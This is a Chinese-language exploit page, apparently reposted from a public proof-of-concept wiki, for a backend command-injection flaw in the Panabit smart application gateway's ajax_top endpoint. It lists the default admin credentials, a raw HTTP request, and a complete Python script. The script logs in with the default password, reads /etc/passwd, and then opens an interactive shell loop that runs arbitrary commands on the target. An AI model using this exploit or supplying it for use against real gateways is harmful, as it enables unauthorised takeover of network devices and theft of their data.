# Panabit 智能應用網關 ajax top 後台命令執行漏洞
==默認賬戶密碼==
admin/panabit
==Request==
POST /cgi-bin/Maintain/ajax_top?action=runcmd&cmd=ls HTTP/1.1 Host: Connection: close Content-Length: 0 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cache-Control: no-cache Accept-Language: zh-CN,zh;q=0.8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: text/html; charset=GB2312 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Cookie: pauser_1618744108=paonline_admin_9328_16197064781_c4229a3a492c76e334f57728abced88b|443|;
==POC==
import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mTitle : Panabit 智能应用网关 ajax_top 后台命令执行漏洞 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/login/userverify.cgi"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
}
data = "action=user_login&palang=ch&username=admin&password=722289d072731e2cc73038aa9ad9e067&code="
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, headers=headers,data=data, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/login/userverify.cgi.... \033[0m".format(target_url))
if "Auth_OK" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在默认口令 admin/panabit \033[0m".format(target_url))
cookie = response.headers['Set-Cookie']
print("\033[36m[o] 获取Cookie : {} \033[0m".format(cookie))
POC_2(target_url, cookie)
else:
print("\033[31m[x] 请求失败 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/cgi-bin/Maintain/ajax_top?action=runcmd&cmd=cat /etc/passwd"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "{}".format(Cookie)
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=5)
if 'root' in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {}存在漏洞 ,执行 cat /etc/passwd \033[0m".format(target_url))
print("\033[36m[o] 响应为:\n{} \033[0m".format(response.text))
while True:
Cmd = input("\033[35mCmd >>> \033[0m")
if Cmd == "exit":
sys.exit(0)
else:
POC_3(target_url, Cmd, Cookie)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cmd, Cookie):
vuln_url = target_url + "/cgi-bin/Maintain/ajax_top?action=runcmd&cmd={}".format(Cmd)
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "{}".format(Cookie)
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url ,headers=headers, verify=False, timeout=5)
response_data = response.text.replace("
", "\n")
print("\033[36m[o] 响应为:\n{} \033[0m".format(response_data))
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
==參考==
https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Panabit/Panabit%20%E6%99%BA%E8%83%BD%E5%BA%94%E7%94%A8%E7%BD%91%E5%85%B3%20ajax_top%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容